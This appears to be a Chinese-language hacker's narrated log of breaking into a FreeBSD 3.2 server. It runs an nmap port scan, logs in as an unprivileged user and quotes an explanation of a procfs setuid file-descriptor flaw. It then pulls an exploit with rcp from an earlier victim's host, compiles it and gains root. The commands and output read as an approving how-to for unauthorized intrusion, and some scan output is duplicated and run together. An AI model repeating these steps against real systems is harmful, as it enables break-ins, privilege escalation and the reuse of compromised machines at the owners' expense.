Starting nmap V. 2.3BETA12 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on www.targe.com (111.111.111.111): Port State PRotocol Service 7 open tcp echo 9 open tcp discard 19 open tcp chargen 21 open tcp ftp 23 open tcp telnet 25 open tcp smtp 37 open tcp time 79 open tcp finger 80 open tcp http 111 open tcp sunrpc 443 open tcp https 512 open tcp exec 513 open tcp login 514 open tcp shell 515 open tcp printer 540 open tcp uucp 3306 open tcp MySQL
TCP Sequence Prediction: Class=random positive increments Difficulty=55346 (Worthy challenge) No OS matches for host (If you know what OS is running on it ………… ………… Nmap run completed -- 1 IP address (1 host up) scanned in 17 seconds
21 open tcp ftp 25 open tcp smtp 79 open tcp finger 80 open tcp http 111 open tcp sunrpc 512 open tcp exec 513 open tcp login 514 open tcp shell 540 open tcp uucp 3306 open tcp mysql
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>501 Method Not Implemented</TITLE> </HEAD><BODY> <H1>Method Not Implemented</H1> head to /http/1.0 not supported.<P> Invalid method in request head /http/1.0<P> <HR> <ADDRESS>Apache/1.3.9 Server at ***-***-***-*** Port 80</ADDRESS> </BODY></HTML>
Last login: Fri Mar 24 19:04:50 from 202.102.2.147 Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994 The Regents of the University of California. All rights reserved.
FreeBSD 3.2-RELEASE (GENERIC) #0: Tue May 18 04:05:08 GMT 1999
You have mail.
呵,原来是FreeBSD 3.2-RELEASE呀,感觉不错,进来了,看看我的权限如何吧……
> id id uid=1003(ccc) gid=1003(ccc) groups=1003(ccc)
看来能做的事还相当有限噢……再看看系统里有没有别人先……
> w w 9:03PM up 6 days, 2:37, 3 users, load averages: 0.00, 0.01, 0.00 USER TTY FROM LOGIN@ IDLE WHAT ccc p0 **.**.***.*** 6:04PM 2:41 -tcsh (tcsh)
In order to stop this exploit, an additional check was added to the code responsible for I/O on file descriptors referring to procfs pseudofiles. In miscfs/procfs/procfs.h (from FreeBSD 3.0) we read: /* * Check to see whether access to target process is allowed * Evaluates to 1 if access is allowed. */ #define CHECKIO(p1, p2) ((((p1)->p_cred->pc_ucred->cr_uid == (p2)->p_cred->p_ruid) && ((p1)->p_cred->p_ruid == (p2)->p_cred->p_ruid) && ((p1)->p_cred->p_svuid == (p2)->p_cred->p_ruid) && ((p2)->p_flag & P_SUGID) == 0) || (suser((p1)->p_cred->pc_ucred, &(p1)->p_acflag) == 0)) As we see, process performing I/O (p1) must have the same uids as target process (p2), unless... p1 has root priviledges. So, if we can trick a setuid program X into writing to a file descriptor F referring to a procfs object, the above check will not prevent X from writing. As some of readers certainly already have guessed, F's number will be 2, stderr fileno... We can pass to a setuid program an appropriately lseeked file descriptor no 2 (pointing to some /proc/pid/mem), and this program will blindly write there error messages. Such output is often partially controllable (e.g. contains program's name), so we can write almost arbitrary data onto other setuid program's memory.
exploits, but in fact differs profoundly. It exploits the fact that the properties of a fd pointing into procfs is not determined fully by "open" syscall (all other fd are; skipping issues related to securelevels). These properties can change because of priviledged code execution. As a result, (priviledged) children of some process P can inherit a fd opened read-write, though P can't directly gain such fd via open syscall.
懒得把它弄成中文的了……感兴趣则看,不感兴趣就跳过吧……
好,那就把漏洞利用程序rcp过去吧
>rcp root@***.***.***.**:/tmp/pcnfs.c /tmp/
其中***.***.***.**是以前的一个倒霉蛋,/下被加了+ +的家伙……
编译运行——可能得对程序做一些小小的更改……
>gcc pcnfs.c -o p >./p -4000 -10000 shellcode addr=0xbfbfcd4c stack=0xbfbfaddc Wait for "Press return" prompt: New passWord: Press return.
id uid=1003(ccc) gid=1003(ccc) euid=0(root) groups=1003(ccc)